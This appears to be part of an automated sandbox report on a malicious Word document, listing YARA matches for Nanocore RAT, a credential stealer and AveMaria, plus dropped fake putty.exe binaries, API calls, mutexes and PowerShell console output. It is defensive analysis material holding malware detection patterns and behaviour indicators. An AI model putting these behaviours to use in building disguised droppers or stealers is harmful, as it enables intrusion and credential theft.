        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000002.2096261364.00000000002C0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.2094462607.0000000000160000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: putty[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty.exe.3.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty.exe.6.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: images.exe.13.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty[1].exe.0.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: putty.exe.3.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: putty.exe.6.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 10.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 10.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 11.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 11.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 12.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 12.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: images.exe.13.dr, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: 13.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.csTask registration methods: 'Register'
        Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@45/31@24/2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_005708A2 AdjustTokenPrivileges,11_2_005708A2
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 11_2_0057086B AdjustTokenPrivileges,11_2_0057086B
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,13_2_00410B38
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 15_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,15_2_00410B38
        Source: C:\ProgramData\images.exeCode function: 21_3_042394E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,21_3_042394E0
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,13_2_0041405F
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,13_2_004148B6
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,13_2_00415169
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: 13_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_0040D33C
        Source: C:\Users\user\AppData\Roaming\putty.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$W PO1100372954 -.docJump to behavior
        Source: C:\Windows\System32\drvinst.exeMutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{6a1c2465-7ac5-4f1d-acc5-ef04fcf454c9}
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCDE9.tmpJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........)...............................).....`I+........v.....................K2.....................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v....(.......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............\..j....0.l.............................}..v............0...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j....p...............................}..v............0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.5.............}..v............0.................l.....$.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j....................................}..v....8.......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............\..j....0.l.............................}..v............0...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....................................}..v....8.......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............\..j....0.l.............................}..v............0...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....................................}..v....8.......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.p.u.t.t.y...e.x.e.'.........l.....J.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j....................................}..v....p.......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............\..j....0.l.............................}..v....8.......0...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j....................................}..v....p.......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w....... . . .e.r.a.t.i.o.n.E.x.c.e.p.t.i.o.n...........}..v....."......0.................l.....&.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w..................j....@#..............................}..v.....#......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................\..j....0.l.............................}..v.....*......0...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....@+..............................}..v.....+......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ . . .o.m.m.a.n.d.s...S.t.a.r.t.P.r.o.c.e.s.s.C.o.m.m.a.n.d.....0.................l.....<.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....0..............................}..v....81......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......\..j....0.l.............................}..v.....4......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....5..............................}..v.....6......0.................l.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................p.......#.........).............p.................).....`I+........v.....................K2.....................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#................].j....................................}..v............0.................m.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../.......u.r.i.n.g. .a. .W.e.b.C.l.i.e.n.t. .r.e.q.u.e.s.t..."...H.......0.................m.....6.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../................].j....................................}..v............0.................m.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7...............}..v............0.................m.....".......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;................].j....H...............................}..v............0.................m.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............^].j....@"m.............................}..v............0...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G................].j....H...............................}..v............0.................m.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............^].j....@"m.............................}..v............0...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S................].j....H...............................}..v............0.................m.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.p.u.t.t.y...e.x.e.'.........m.....J.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._................].j....................................}..v............0.................m.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............^].j....@"m.............................}..v............0...............................................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k................].j....x...............................}..v............0.................m.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......w...............^].j....@"m.............................}..v....0.......0.......................f.......................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....w................].j....................................}..v....h.......0.................m.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ .......^].j....@"m.............................}..v............0.................m.............................Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................].j....................................}..v....0.......0.................m.............................Jump to behavior
        Source: C:\Windows\SysWOW64\reg.exeConsole Write: ......................*.........T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y...........%.....N....... .%.......%.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ................................M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .[.V.e.r.s.i.o.n. .6...1...7.6.0.1.]...........!.....H.................4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....................................................6.0.1.]...........!.............x.........4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....................................................6.0.1.].................~.......x.........4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ....................................c.r.(.P.....................................................6.0.1.]...........!.......................4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: .................._.....................(.P.....................................................6.0.1.]...........!.......................4.....
        Source: C:\Windows\SysWOW64\cmd.exeConsole Write: .................._.............C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.>.........................6.0.1.]...........!.....(.......x.........4.....
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
